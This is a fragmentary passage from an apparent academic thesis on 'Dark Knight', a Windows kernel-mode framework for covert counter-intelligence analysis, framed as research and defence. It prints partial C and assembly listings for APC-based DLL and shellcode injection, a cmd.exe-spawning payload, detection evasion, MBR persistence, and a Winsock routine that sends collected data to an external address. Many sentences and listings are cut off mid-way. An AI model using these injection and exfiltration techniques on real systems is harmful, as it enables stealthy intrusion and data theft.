pLoadLibrary = G e t P r o c e d u r e A d d r e s s ( pLdrListEntry - > DllBase ,
pLdrListEntry - > SizeOfImage ,
" LoadLibraryExA " ) ;
if ( pLoadLibrary != NULL )
{
// Open a handle to the target process
4.2. DARK KNIGHT KERNEL-MODE DRIVER 82
// A l l o c a t e pool
pkApc = ( PKAPC ) ExAllocatePool ( NonPagedPool , sizeof ( KAPC ) ) ;
if ( pkApc != NULL )
{
// I n i t i a l i z e APC
KeInitializeApc ( pkApc ,
pkTargetThread ,
0,
( P K K E R N E L _ R O U T I N E ) & ApcKernelRoutineDll ,
0,
( P K N O R M A L _ R O U T I N E ) pLoadLibrary ,
UserMode ,
pMemory ) ;
status = STATUS_SUCCESS ;
}
}
}
ZwClose ( hProcId ) ;
}
}
}
else
{
K e U n s t a c k D e t a c h P r o c e s s (& ApcState ) ;
}
return ( status ) ;
}
4.2. DARK KNIGHT KERNEL-MODE DRIVER 83
Once user-mode or kernel-mode DLL injection has occurred the payload’s entry-
point (DllMain) is called and a thread is spawned and executed. Listing 4.5 shows an
time spent in DllMain in order to avoid a deadlock race condition with the process’
loader lock [83].
user-mode and user-mode to user-mode DLL injection methods enable both of our
Trident and Sidewinder techniques, as discussed in Chapter 3. The downside of
this method is that it leaves evidence behind as the DLL exists temporarily on-disk
prior to injection and the DLL appears in the process’ loaded module list. Both
of these problems can be mitigated. For example, by using the method shown in
Listing 4.4 to locate kernel32.dll we can unlink our associated DLL entry from
the loaded module linked list, thereby making it invisible. A third issue also exists
This problem can also be bypassed by adding a detour to the OS’s implementation
of PsSetLoadImageNotifyRoutine and filtering its callbacks whenever it executes
with FullImageName matching one of our payloads. DLL injection is provided as an
Listing 4.5: Example of a DLL payload used in kernel-mode or user-mode DLL APC
injection.
# include < windows .h >
# include < stdio .h >
# include < stdlib .h >
return (1) ;
}
extern " C " __declspec ( dllexport ) BOOL WINAPI DllMain ( HINSTANCE hInst ,
DWORD dwReason ,
LPVOID lpReserved )
{
HANDLE hThread ; // Thread handle
DWORD nThread ; // Thread ID
switch ( dwReason )
{
case D L L _ P R O C E S S _ A T T A C H :
// Create a new thread
if (( hThread = CreateThread ( NULL , 0 , PayloadThread , NULL ,
0 , & nThread ) ) != NULL )
{
// Close thread handle
CloseHandle ( hThread ) ;
}
break ;
case D L L _ P R O C E S S _ D E T A C H :
break ;
case D L L _ T H R E A D _ A T T A C H :
break ;
case D L L _ T H R E A D _ D E T A C H :
break ;
}
return ( true ) ;
}
Following the metamorphic payload generation, we are able to avoid the use of trans-
formation sequences by creating user-mode programs with the WIN32API and re-
moving their PE headers while extracting the relocation information as stored in the
.reloc section of the PE. The relocation information outlines the address remappings
4.2. DARK KNIGHT KERNEL-MODE DRIVER 85
based on a dynamic loading point; if the program loads in a virtual address space
different than that originally specified then the PE loader repairs the locations using
the .reloc section, otherwise it is discarded [84]. This data can be ascertained with
Matt Pietrek’s PEDUMP utility [85].
The .reloc section is the segment used by DLLs for PIC, although in this case
it acts as PIE for PEs. This method shares many similarities with the metamorphic
payload generation technique—the transformation sequences are represented as relo-
Once the payload is available (via one of the techniques outlined in Section 4.2.2) we
must inject the payload into the target process. This follows the injection methodol-
injecting custom redirection calls that allow the alteration of specific functionality
within a resident malicious threat, or any other desired payload.
To initiate this sequence we must first verify that the target process has the
required modules loaded to ensure our shellcode will run unencumbered. This can be
avoided by adding additional LoadLibrary calls to the start of the payload in order
to load the necessary modules, but this method may trigger alarms if any alerting
software notices dynamic loading of modules at runtime. To avoid this, we use the
method in Listing 4.6, outlined by MSDN [86]. This technique relies on user-mode
4.2. DARK KNIGHT KERNEL-MODE DRIVER 86
injection of Listing 4.6 into the process and analyzing the result from kernel-mode.
Our GetProcModules user-mode payload opens the target process specified by
dwProcId with OpenProcess and iterates through the process’ modules with Enum-
if ( proc != NULL )
{
if ( E n u m P r o c e s s M o d u l e s ( hProc , hMods , sizeof ( hMods ) , & dwCbNeeded ) )
{
// Iterate through all modules b e l o n g i n g to process
for ( unsigned int i = 0; i < ( dwCbNeeded / sizeof ( HMODULE ) ) ; i ++)
{
TCHAR strModName [ MAX_PATH ];
CloseHandle ( hProc ) ;
}
After verifying that the necessary modules are already loaded into the target pro-
cess we are free to employ our APC injection technique. The payload is injected,
executed and control may either return to the core driver or proceed with further
4.2. DARK KNIGHT KERNEL-MODE DRIVER 87
if (! pkApc ) return ( S T A T U S _ I N S U F F I C I E N T _ R E S O U R C E S ) ;
if (! pMdl )
{
ExFreePool ( pkApc ) ;
return ( S T A T U S _ I N S U F F I C I E N T _ R E S O U R C E S ) ;
}
// Perform PRE t r a n s f o r m a t i o n s
AdjustShellcode ( pMappedAddress , pCode , " PRE " ) ;
__try
{
// Probe and lock pages to make them memory r e s i d e n t for write access
M m P r o b e A n d L o c k P a g e s ( pMdl , KernelMode , IoWriteAccess ) ;
}
__except ( E X C E P T I O N _ E X E C U T E _ H A N D L E R )
{
IoFreeMdl ( pMdl ) ;
ExFreePool ( pkApc ) ;
return ( S T A T U S _ U N S U C C E S S F U L ) ;
}
// Perform POST t r a n s f o r m a t i o n s
AdjustShellcode ( pMappedAddress , pCode , " POST " ) ;
// I n i t i a l i z e APC
KeInitializeApc ( pkApc , pkTargetThread , OriginalApcEnvironment , & ApcKernelRoutine ,
NULL , ( P K N O R M A L _ R O U T I N E ) pMappedAddress , UserMode , ( PVOID ) NULL ) ;
// Queue APC
if (! K e I n s e r t Q u e u e A p c ( pkApc , 0 , NULL , 0) )
{
// If the q u e u e i n g p r o c e d u r e failed free the a s s o c i a t e d r e s o u r c e s
MmUnlockPages ( pMdl ) ;
IoFreeMdl ( pMdl ) ;
ExFreePool ( pkApc ) ;
return ( S T A T U S _ U N S U C C E S S F U L ) ;
}
return (0) ;
}
the payload size and allocate an MDL with IoAllocateMdl to describe the pay-
load’s memory. We continue with MmProbeAndLockPages to make our pages, as
described by the MDL, memory resident for write access. Now we are able to at-
tach to the target thread’s address space and map the payload into target address
the case of Listing 4.7 we employ metamorphic payload generation (Section 4.2.2)
which requires both pre- and post-injection transformation of the payload, as shown
then we update the target thread’s kernel thread structure (KTHREAD) to notify it of
our pending APC.
If the Trident technique is employed then we use the KernelRoutine to deal with
the callback and further APC injections, as per Chapter 3. An example callback for
peTargetThread = RandomThread () ;
ApcInject ( peTargetThread , peTargetThread - > ThreadsProcess , dynCode ) ;
}
If the Sidewinder technique is utilized then we begin by employing the Dark Knight
framework to inject an initial payload and unload the framework so no driver exists.
In this case it is the actual payload we are interested in, performing injection between
threads in user-mode as discussed in Chapter 3. An implementation of this is shown
in Listing 4.9, although various methods enabling the injection of code into the target
thread exist.
VOID __cdecl A p c I n j e c t A u t o P a y l o a d ()
{
HANDLE hTargetThread = NULL ;
HANDLE hTargetProcess = NULL ;
THREADENTRY32 teTargetEntry ;
LPVOID lpAddr ;
DWORD dwThreadId ;
DWORD dwProcessId ;
DWORD dwCb ;
DWORD dwBytesReturned ;
DWORD dwLimit ;
DWORD dwBytesWritten ;
// Seed PRNG
srand (( unsigned int ) time ( NULL ) ) ;
if ( hTargetThread != I N V A L I D _ H A N D L E _ V A L U E )
{
RETRY_INJECT :
{
goto RETRY_INJECT ;
}
CloseHandle ( hTargetThread ) ;
}
Listing 4.9 avoids touching memory disks and object tables in order to evade detec-
tion. It begins by executing the core tasking—the operational goal of the payload—
after which it selects the next target thread by first creating a snapshot of the system’s
current processes, threads, heaps and modules with CreateToolhelp32Snapshot and
iterating through the list of threads with Thread32First and Thread32Next. Once
a target thread has been selected it is acquired with OpenThread, and the thread’s
parent is accessed with OpenProcess, in order to attain handles necessary for code
injection. Now we are free to inject the payload into the target process’ address
space by first allocating a memory segment with VirtualAllocEx, copying the pay-
load into the newly allocated segment with WriteProcessMemory, and finally queue-
ing the APC at the target with the entrypoint of the payload using QueueUserApc.
The payload that gets copied into the target address space is the identical compiled
DLL can also be mapped into the address space of the target in order to bypass the
overhead of address relocation associated with the payload (outlined in Section 4.2.2),
however this also complicates the destruction of the associated file upon completion
and leaves behind trace evidence on disk that can be used in detecting our presence.
User-mode threads can also be forced to execute delivered APCs by having them call
KeTestAlertThread.
4.3 Payloads
Dark Knight enables the utilization of a large arsenal of payloads via injection. In this
section we discuss the investigated payloads used in conjunction with Dark Knight
to support counter-intelligence operations. This includes generic shellcode execution,
employing a myriad of community developed tools to support concealed execution,
and code execution manipulation using information ascertained through static code
analysis, enabling the investigators to manipulate the malicious threat. We also in-
vectors.
4.3. PAYLOADS 93
Almost any existing shellcode can be modified for use. Alterations that must be
enforced include removing the buffer overflow component of exploits, as we are al-
ready running with local privileges and are not concerned with gaining an execution
environment, although we may be interested in privilege escalation if we have only
injected the user-mode payload and require the installation of the kernel-mode loader
component for persistence beyond restart.
One such example of this is shown in Listing 4.10, a payload that executes a com-
mand shell using the WinExec WIN32 API function. Following the explanation of
the metamorphic engine outlined in Section 4.2.2, Listing 4.11 shows the necessary
transformations required to execute this payload. In Listing 4.10 we are targeting
specific addresses associated with Windows XP SP3, but we can instead include
GetProcAddress and LoadLibrary calls in order to make the code generic for execu-
tion on any Windows OS variant.
Listing 4.11: Transformations required by for the command shell spawning payload.
POST REF :[0 x0000000c :+0 x4 ]
POST INSERT :[0 x00000014 ]=\ " C :\\ WINXP \\ System32 \\ cmd . exe \"
4.3. PAYLOADS 94
into the target code and execute functionality identified through static code analysis,
shown in Listing 4.12. This simple method allows non-persistent manipulation of
target code, and can be extended to perform inline injections without the overhead of
static code analysis by analyzing call paths from the Dark Knight driver. We exploit
our understanding of the target OS’s calling conventions, in this case pushing the
Listing 4.12: Shellcode executing a target function acquired with static analysis.
xor eax , eax ; Zero eax r e g i s t e r
mov eax , 0 x6f9e72b0 ; L o c a t i o n of target f u n c t i o n
push 601 ; Push Nth f u n c t i o n p a r a m e t e r
...
push 0 ; Push second f u n c t i o n p a r a m e t e r
push 0 xffff ; Push first f u n c t i o n p a r a m e t e r
call eax ; Call f u n c t i o n
...
nop ; Perform any i n v e s t i g a t i o n of
nop ; data r e t u r n e d or m a n i p u l a t e d
nop ; by the target f u n c t i o n
...
ret 0 x0c ; Return from the inject
An example utilizing this technique is shown in Listing 4.13. This uses the
DecryptLogFile function used to decrypt an enciphered log file stored on disk by a
malicious program and returns a FILE pointer to the log file. By calling this function
via our injection framework we can decrypt the malicious code’s log file, bypassing
the mode (cMode) to open the file with, and an unknown boolean (bUnknown)—in
reverse order and call the target function DecryptLogFile at the address ascertained
4.3. PAYLOADS 95
through static code analysis. We complete by returning the original return value of
the target function. In this way we can execute code belonging to the malicious code.
Listing 4.13: Code execution of DecryptLogFile function located through static code
analysis.
# define F U N C _ D e c r y p t L o g F i l e 0 x57650ce0
_asm
{
push ebx // Save o r i g i n a l ebx r e g i s t e r c o n t e n t s
xor ebx , ebx // Clear ebx r e g i s t e r
mov bl , bUnknown // Prepare unknown p a r a m e t e r
push ebx // Push unknown p a r a m e t e r onto call stack
push cMode // Push mode onto call stack
push cFileName // Push f i l e n a m e onto call stack
push fLog // Push pointer to log file set by f u n c t i o n
call dwFunc // Call D e c r y p t L o g F i l e
add esp , 0 x10 // Adjust stack pointer
mov bRetVal , al // Grab return value
pop ebx // Restore the saved ebx r e g i s t e r c o n t e n t s
}
return ( bRetVal ) ;
}
Through these techniques we are able to execute code exploiting any functionality,
Another payload vector involves methods of covert exfiltration utilizing existing chan-
nels. One such technique involves hijacking a target program’s sockets or generating
new sockets originating in the target program’s address space. To accomplish this,
we begin by enumerating network connections and, depending on the amount of in-
[87]:
• Bindshell : Dark Knight injects a payload into a target process that binds to a
socket and listens for an incoming connection. This allows a connection to be
initiated from an external machine.
opens a socket and calls out to a specified external machine. This bypasses
firewalls or other protections that filter incoming traffic.
the target process utilizing the existing connection and rebinds to the socket.
the socket calls are OS agnostic. Once the required library is loaded we initialize
our socket with a call to socket, creating a TCP-based stream socket under the
IPv4 address family. With the socket initialized we setup the data associated with
our server—stored in a sockaddr in structure—that this connection will be opened
to. We proceed with a call to connect to initiate our connection and acquire the
associated locally-bound socket name with getsockname. With all of the appropriate
data in hand, and the connection up, we send our collected data with send. To
finish, we close our connection with closesocket and deinitialize the loaded Winsock2
library with WSACleanup, thereby completing our reverse exfiltration routine. This
works for small amounts of data, but if we wish to exfiltrate large quantities then
we must modify it to continuously send back data, fragmenting cData into smaller
chunks, until nBytesSent equals nDataSize and all collected data is transferred.
// Link w i n s o c k 2 library
# pragma comment ( lib , " ws2_32 . lib " )
int main ()
{
SOCKET winSock ;
struct sockaddr_in sockSrv ;
char * cIP = ADDR ;
short nPort = PORT ;
char * cData = NULL ;
int nDataSize = 0;
int nBytesSent = 0;
int nRetVal = 0;
// I n i t i a l i z e W i n s o c k 2 library
WSAStartup ( MAKEWORD (2 ,2) , & wsaData ) ;
4.3. PAYLOADS 98
// I n i t i a l i z e our socket
winSock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
// E x f i l t r a t e c o l l e c t e d data
nBytesSent = send ( winSock , & cData , nDataSize , 0) ;
// D e i n i t i a l i z e W i n s o c k 2 library
WSACleanup () ;
return ( nRetVal ) ;
}
detecting anomalous malicious activity. A HIDS is different from anti-virus and anti-
malware solutions in that they are primarily concerned with detecting known threats
and network traffic, as well as performing access control [88]. They may also em-
ploy traditional signature-based analysis techniques—supplementing the shortfalls of
compared back to for malicious changes. HIDS also provide supplemental data that
Network-based Intrusion Detection Systems (NIDS) are unable to capture, such as
gathering packets prior to being encrypted by a malicious exfiltration routine [89].
Considering these characteristics, a HIDS should hook into every potential infec-
tion vector on the system: whether it be watching for DLL or API injection attacks,
hooking the various available tables, monitoring for unexpected overhead that could
be caused by malicious virtualization, or any of the other techniques described in
Chapter 2. Potential infection vectors, with the associated monitored WIN32 API
calls, are discussed below with a few examples showing how this is implemented in
conjunction with the Dark Knight framework.
• Users: The name, description as well as local and global group membership can
be monitored for each user on the system with NetQueryDisplayInformation,
• Groups: The name, description and members can be monitored for each local
and global group associated with the system via NetLocalGroupEnum, Net-
4.3. PAYLOADS 100
• Shares: The name, path and type (i.e. disk, print queue, device, IPC, temporary
or special) of each share associated with the system can be enumerated with
NetShareEnum.
• Files: The name, path and security descriptor of all files on the system can
be accessed with FindFirstFileW and FindNextFileW to iterate through the
• Named Pipes: The name and associated security descriptor for every named
pipe on the system can be monitored by searching for files matching the format:
"\\.\Pipe\" with FindFirstFileW in order to initialize the first HANDLE pointer
• Mailslots: The name and associated security descriptor for every mailslot on
the system can be monitored employing the same method used for named pipes,
except by searching for files matching the format: "\\.\Mailslot\".
• Environment Variables: The name and associated values for all environment
variables on the system can be monitored with GetEnvironmentStrings.
• Processes: Process information including the name, ID, owner, group, secu-
rity attributes and privileges can be acquired and monitored employing a wide
4.3. PAYLOADS 101
range of functions. This is done by iterating through the process list via
EnumProcesses after which security info can be queried through the Open-
Attributes.
• Device Drivers: Information pertaining to the device drivers loaded into the
OS kernel, including the image name and image path, can be obtained. This is
accomplished by iterating through the loaded drivers list via the EnumDevice-
Drivers, followed by accesses to GetDeviceDriverBaseName and GetDevice-
DriverFileName.
• Services: The name, display name, account running level, type (i.e. FILE SYS-
TEM DRIVER, KERNEL DRIVER, WIN32 OWN PROCESS or WIN32 SHARE PROCESS),
state, accepted controls, required privilege levels and image path by access-
ing the service control manager database with OpenSCManager, accessing the
ENUM SERVICE STATUS PROCESS service structure with EnumServicesStatusEx,
the GetTcpTable and GetUdpTable respectively. Once these tables have been
retrieved and populated into the MIB TCPTABLE or MIB UDPTABLE structure the
members MIB TCPROW or MIB UDPROW can be iterated through based on the num-
ber of entries, as defined in dwNumEntries, to access the state, local address,
local port, remote address and remote port for TCP connections and the local
address and local port for UDP connections. This can also be done for IPv6
connection tables.
• Firewall : The state of the firewall, the name of allowed applications, as well as
the name and number of allowed ports can be queried using various OS function-
ality. By using CoCreateInstance with the interface structures InetFwProfile,
void H i d s G e t D e v i c e D r i v e r s ()
{
LPVOID * lpImageBase = NULL ;
TCHAR strBasename [ MAX_SIZE ];
TCHAR strFilename [ MAX_SIZE ]
DWORD dwCb = 0;
DWORD dwCbNeeded = 0;
{
if ( G e t D e v i c e D r i v e r B a s e N a m e ( lpImageBase [ i ] , strBasename , NAME_SIZE ) )
{
if ( G e t D e v i c e D r i v e r F i l e N a m e ( lpImageBase [ i ] , strFilename ,
NAME_SIZE ) )
{
// A c q u i r e d b a s e n a m e and f i l e n a m e for device driver i
}
}
}
}
free ( lpImageBase ) ;
}
}
using the APC technique outlined in Chapter 3, although they can also be imple-
mented as a standalone executable. Two example implementations of this includes
enumerating device drivers loaded into the OS kernel, shown in Listing 4.15 based on
the example from MSDN [91], and the monitoring of IPv4 TCP connections, shown
in Listing 4.16 based on the Netstatp utility from Sysinternals [92].
vice drivers acquiring their base name and filename with GetDeviceDriverBaseName
and GetDeviceDriverFileName respectively. This enables us to locate potentially
malicious device drivers on the target system that either match pre-existing charac-
teristics or appear as outliers on the OS.
In Listing 4.16 we exhibit a program to list TCP connections in Windows. We
begin with a call to WSAStartup that initializes the Winsock DLL. If the DLL loads
without error then we acquire the IPv4 TCP connection table with GetTcpTable.
We call GetTcpTable first to set dwSize to the required buffer size of pmibTcpTable,
expecting a failure due to ERROR INSUFFICIENT BUFFER as we don’t initially know
the TCP table’s size. With the proper buffer size in hand we again call GetTcpTable
4.4. SUMMARY 104
with the appropriate dwSize after allocating the necessary space for pmibTcpTable.
We can now iterate through each of the connections acquiring the local and remote
address and port via getservbyport. We can also ascertain other information about
the connections with the MIB TCPTABLE structure, such as the state of the connection
by mapping the dwState field against our ccTcpState array. A similar technique
can be employed to accomplish monitoring of IPv4 UDP sockets, as well as IPv6 for
both TCP and UDP. This enables us to investigate potentially malicious connections,
whether their remote address is blacklisted or they’re using a port that is known to
be associated with malicious activity.
All of the HIDS detection techniques outlined in this subsection are able to be
utilized by our framework. They can be implemented as user-mode programs linked
with the WIN32API and injected into user-mode processes. Results are collected
via kernel-mode to user-mode interaction in the core driver. That being said, a full
implementation of a HIDS is beyond the scope of our work. A HIDS is an integral
requirement for a complete analysis framework to locate and identify the malicious
threat, however the primary goal of our research is the covert analysis of the threat
for the purpose of intelligence gathering and exfiltration. The development of a HIDS
component to aid Dark Knight should be considered in future work.
4.4 Summary
This chapter has outlined the design of our counter-intelligence framework, Dark
Listing 4.16: Listing TCP connections based on the OS kernel’s TCP table.
static char ccTcpState [][16] = {
" UNKNOWN " , " CLOSED " , " LISTENING " , " SYN_SENT " ,
" SYN_RCVD " , " ESTABLISHED " , " FIN_WAIT1 " , " FIN_WAIT2 " ,
" CLOSE_WAIT " , " CLOSING " , " LAST_ACK " , " TIME_WAIT " ,
" DELETE_TCB "
};
void HidsGetTcpPorts ()
{
WSADATA wsaData ;
PMIB_TCPTABLE pmibTcpTable ;
DWORD dwSize = 0;
WORD wVersion = MAKEWORD (1 , 1) ;
servent * seServ ;
char * cState ;
counter-intelligence operations.
By utilizing the techniques described in Section 2.6.1 we are able to maintain a
persistent footprint on the box using MBR modifications. This allows bootstrap-
ping the main Dark Knight kernel-mode component prior to OS loading conditioning
4.4. SUMMARY 106
complishing a wide range of tasks. This includes the utilization of generic shellcode
sequences as well as the dynamic instrumentation of suspicious binaries. We can
also create payloads utilizing network sockets, USB, or any other medium in order to
exfiltrate our collected intelligence. This thereby satisfies our data exfiltration crite-
ria. Finally, we investigate HIDS payloads capable of performing anomaly detection
lined in Section 2.2. We have achieved a suitable stealth capability while maintaining
direct access to rich OS structures and functionality as well as any pertinent infor-
mation that may be located on the target system, circumventing semantic gap com-
plications. We are also able to identify and manipulate emerging or existing threats
and exfiltrate data collected through the course of the operation, thereby supporting
counter-intelligence operations.
107
Chapter 5
The main investigation of this thesis involves the identification and implementation of
novel techniques to support counter-intelligence operations. This endows investigators
with the tools to aid in establishing the identity and capability of attackers performing
computer system and network intrusions as well as the objective and scale of the
associated breaches.
Chapter 2 begins with a survey of the rootkit field (performed in Sections 2.2-2.4)
outlining the factors having the greatest impact on counter-intelligence operations.
tion 2.6 continues, delving into the innards of Windows NT-based kernels to identify
mechanisms of interest to achieve a persistent footprint and enable the calling of
APCs. Section 2.7 brings Chapter 2 together, creating a cohesive roadmap for this
thesis.
Chapter 3 provides a blueprint of APCs and explores the tactical capabilities they
provide in order to justify their use in our work. This invokes a full investigation of
5.1. DISCUSSION 108
injection as exposed by APCs. Injection enables the insertion and execution of a pay-
load into a target process’ address space masking the payload’s origin. Injection via
ter 3.
This concluding chapter offers a comparison of the developed techniques to prior
work as well as a look at the significance and validity of each of the techniques. Lastly,
future work and areas of interest are considered following with concluding remarks.
5.1 Discussion
interested in comparing our results to that of prior work, assessing the scalability
5.1. DISCUSSION 109
of our technique for coverage against existing and future implementations of Win-
dows, and evaluating the performance overhead of the Dark Knight implementation.
We finish with a discussion of the implications of this thesis on the current state of
counter-intelligence operations and malicious threats.
out this work share commonalities with previous works, as discussed in Chapter 2. A
description of similarities and differences between the two are briefly outlined.
Non-exported Functionality
Previous work has explored the utilization of non-exported functionality within Win-
dows NT-based kernels, including works by Barbosa [69], Ionescu [70], Suiche [71],
and Okolica and Peterson [72]. The FU and FUTo have furthered this work by per-
forming inline disassembly to access the PspCidTable [36]. Our research into this
subject was not meant to identify new non-exported functionality, but rather to uti-
lize it in a way that scales to all versions of Windows by reconstructing interfaces and
mapping the desired functionality.
Injection
The investigation and development of our APC injection technique shares similarity
to the methods employed in both the TDL4 [57, 67] and ZeroAccess [58, 59] rootkits.
5.1. DISCUSSION 110
The techniques developed independently through our research differ in the calling
mechanisms we use to construct memory segments in target processes and threads as
well as the methodology associated with injecting and executing the payloads. These
differences are discussed in Chapter 3, alongside alternative techniques that could
potentially be employed to accomplish this task.
In Chapter 2 we mentioned that the primary focus of our research into the
Sidewinder technique is derived from the Magenta rootkit. Although our work shares
a common goal, no evidence exists supporting the existence of Magenta, and as such
we cannot directly compare our results with that of the previous work in this field.
5.1.2 Scalability
The Dark Knight framework was developed and tested primarily on Windows XP
with Service Pack 3 installed, however initial testing was also performed on Vista to
verify the scalability of the technique. Based on the tests performed, the non-exported
functionality exploitation and APC injection, including both Trident and Sidewinder,
extend to all Windows NT-based kernels described in Table 2.2. This ensures the
that these techniques will extend into future NT kernels as long as APC functionality
remains, and the non-exported functionality is not deprecated.
entire OS, otherwise the system becomes inundated while constantly operating at the
APC IRQL, not allowing PASSIVE execution to occur.
5.1.4 Implications
The techniques developed and implemented throughout this work signify an emerg-
ing capability for counter-intelligence operations and malicious code execution alike.
ers. The development of Trident and Sidewinder clearly outline the capabilities of
APC functionality, whether used by investigative frameworks and HIDS or by mal-
ware. Cases of these techniques being exploited in the wild with malicious intent
have already been identified, as in the cases of TDL4 [57, 67] and ZeroAccess [58, 59],
necessitating the requirement to improve control and detection of APCs within the
Windows kernel.
5.2. FUTURE WORK 112
This section discusses components of Dark Knight that might be explored in future
work as well as further investigations into the discussed techniques that could be
made.
While this work has primarily focused on the capabilities of APCs for use in counter-
intelligence investigations it is important to also consider these capabilities if employed
while evading detection by sysadmins or end users. Further investigation into the
identification of signatures relating to malicious APC use is important in the further
The metamorphic payload generator developed with Dark Knight (Section 4.2.2) is
a proof-of-concept. The engine could be improved with the streamlining of all trans-
formations into a single locale, which can be accomplished on-the-fly during code
injection after the address of the mapped memory segment has been returned by
simplifies the process by avoiding the PRE and POST conditions currently required for
payload adjustment.
Although we have also developed two other techniques—PIC DLL injection and
5.3. CONCLUSION 113
PE injection with relocation table adjustments—these are easy to identify via basic
signature-based detection. Utilizing metamorphic transformation engines, conceiv-
ably in unison with the aforementioned techniques, we are able to better defeat such
detection activities.
Improving collaborative efforts between the Dark Knight framework and HIDS com-
ponents will enable quicker reactive measures during counter-intelligence operations.
By immediately detecting malicious activity the threat can be analyzed more rapidly
and collection can be initiated to gather more information on the threat actor. As
Dark Knight already operates within kernel-mode it is trivial to integrate HIDS mod-
ules into the existing framework to include advanced detection functionality, following
the discussion presented in Section 4.3.3.
5.3 Conclusion
The increasing sophistication of computer system and network attacks against gov-
ernment, military and corporate machines has necessitated the requirement for better
support in counter-intelligence operations. This enables investigators to better iden-
tify the identity of the attacker and their capability as well as the objective and scale
of the breach. Previous attempts to provide interfaces to the infected systems have
either lacked effective capabilities allowing sophisticated attackers to subvert the in-
vestigation or require significant resources to interface with the system due to the
semantic gap when dealing with virtualization environments.
5.3. CONCLUSION 114
gap issue. The features identified include the scalable exploitation of non-exported
kernel functionality to aid in the employment of APCs to hide kernel-mode injection
through the execution of payloads in hijacked user-mode address spaces or the evasion
of kernel-mode monitors through the use of rapid APC injection between user-mode
processes and threads. Implementations of these techniques are presented in the Dark
• A blueprint of APCs and how they can be employed for covert payload execution
and exfiltration applications via APC injection. This includes two developed
techniques exploiting APC injection: Trident, kernel-mode to user-mode injec-
tion, and Sidewinder, user-mode to user-mode injection.
Bibliography
[1] Microsoft Developer Network. Do waiting threads receive alerts and APCs?
[2] CBC News. Foreign hackers attack Canadian government. 2011. [Online; ac-
cessed 16-February-2011].
[4] sKyWIper Analysis Team. sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex
[5] N. Falliere, L.O. Murchu, and E. Chien. W32. stuxnet dossier. White paper,
Symantec Corp., Security Response, 2011.
[6] B. Krekel. Capability of the People’s Republic of China to conduct cyber warfare
and computer network exploitation. Technical report, Northrop Grumman Corp,
2009.
[7] B. Blunden. The Rootkit Arsenal: Escape and Evasion in the Dark Corners of
the System. Wordware, 2009.
BIBLIOGRAPHY 116
[8] G. Hoglund and J. Butler. Rootkits: Subverting the Windows kernel. Addison-
Wesley Professional, 2006.
[9] S. Knight and S. Leblanc. When not to pull the plug: The need for net-
work counter-surveillance operations. Cryptology and information security series,
3:226–237, 2009.
[11] D. Ramsbrock. Mitigating the botnet problem: From victim to botmaster. 2008.
[12] L. Litty, H.A. Lagar-Cavilla, and D. Lie. Hypervisor support for identifying
[13] J. Butler and S. Sparks. Windows rootkits of 2005, part one. Security Focus, 2,
2005.
[14] J. Butler and S. Sparks. Windows rootkits of 2005, part two. Security Focus, 2,
2005.
[15] D.D. Nerenberg. A study of rootkit stealth techniques and associated detection
[16] J. Butler and S. Sparks. Windows rootkits of 2005, part three. Security Focus,
2, 2005.
BIBLIOGRAPHY 117
[17] T. Shields. Survey of rootkit technologies and their impact on digital forensics.
Personal Communication, 2008.
[18] F. Adelstein. Live forensics: Diagnosing your system without killing it first.
Communications of the ACM, 49(2):63–66, 2006.
[19] J.S. Alexander, T.R. Dean, and G.S. Knight. Spy vs. Spy: Counter-intelligence
[20] P.M. Chen and B.D. Noble. When virtual is better than real. In hotos, page
0133. Published by the IEEE Computer Society, 2001.
com/security-hacking-tools/SystemHacking/VanquishRootkit/
VanquishRootkit-ReadMe.txt, 2003. [Online; accessed 31-May-2011].
[24] J. Richter. Load your 32 bit DLL into another process’s address space using
INJLIB. Microsoft Systems Journal-US Edition, pages 13–40, 1994.
[27] M.E. Russinovich and D.A. Solomon. Microsoft Windows Internals: Microsoft
Windows Server 2003, Windows XP, and Windows 2000. Microsoft Press Red-
[29] A. Bunten. Unix and Linux based rootkits techniques and countermeasures.
http://www.first.org/conference/2004/papers/c17.pdf, 2004. [Online; ac-
cessed 25-May-2011].
cessed 14-June-2011].
[31] G. Hoglund. A *REAL* NT rootkit. Volume 0x09, Issue 0x55, Phile# 0x05 of
[34] E. Florio. When malware meets rootkits. White paper, Symantec Corp., Security
Response, 2005.
[35] Devik and Sd. Linux on-the-fly kernel patching without LKM. Volume 0x0b,
Issue 0x3a, Phile# 0x07 of 0x0e-Phrack Magazine, 2001.
BIBLIOGRAPHY 119
[37] M. Nanavati and B. Kothari. Hidden processes detection using the PspCidTable.
MIEL Labs2010, 2010.
[40] S. Sparks and J. Butler. Shadow Walker: Raising the bar for rootkit detection.
[42] Intel. Intel virtualization technology specification for the IA-32 intel architecture.
2005.
[44] J. Rutkowska. Subverting Vista kernel for fun and profit. Black Hat Briefings,
2006.
[45] D.A. Dai Zovi. Hardware virtualization rootkits. BlackHat Briefings USA, 2006.
[46] S.T. King, P.M. Chen, Y.M. Wang, C. Verbowski, H.J. Wang, and J.R. Lorch.
SubVirt: Implementing malware with virtual machines. In Security and Privacy,
2006 IEEE Symposium on, pages 1–14. IEEE, 2006.
BIBLIOGRAPHY 120
[47] D.J Major. Exploiting system call interfaces to observe attackers in virtual
machines. Royal Military College, 2008.
[48] N.A. Quynh and K. Suzaki. Virt-ICE: Next-generation debugger for malware
analysis. BlackHat Briefings USA, 2010.
Courses/CSCE351/IntelArchitecture/IntelExecutionEnvironment.pdf,
2001. [Online; accessed 21-June-2011].
[50] Intel. Intel 64 and IA-32 architectures software developer’s manual: System
programming guide, part 2. 3B, 2011.
[51] L. Duflot, O. Levillain, B. Morin, and O. Grumelard. Getting into the SMRAM:
[52] S. Embleton, S. Sparks, and C. Zou. SMM rootkits: A new breed of OS inde-
[54] A. Tereshkin and R. Wojtczuk. Introducing Ring-3 rootkits. Black Hat USA,
2009.
[57] E. Rodionov and A. Matrosov. The evolution of TDL: Conquering x64. Technical
14-October-2011].
[59] McAfee Labs Threat Advisory. ZeroAccess rootkit. Technical report, ”McAfee”,
2011.
cessed 27-October-2011].
[61] P. Kleissner. Stoned bootkit: Your PC is now stoned! ..again. Black Hat USA,
2009.
accessed 19-November-2011].
[63] M. Matrosov and E. Rodionov. Defeating x64: The evolution of the TDL rootkit.
Technical report, ESET, 2011.
[64] M. Matrosov and E. Rodionov. TDL4 rebooted. Technical report, ESET, 2011.
BIBLIOGRAPHY 122
[66] Microsoft Developer Network. Patching Policy for x64-based systems. http:
accessed 21-November-2011].
[72] J. Okolica and G.L. Peterson. Windows operating systems agnostic memory
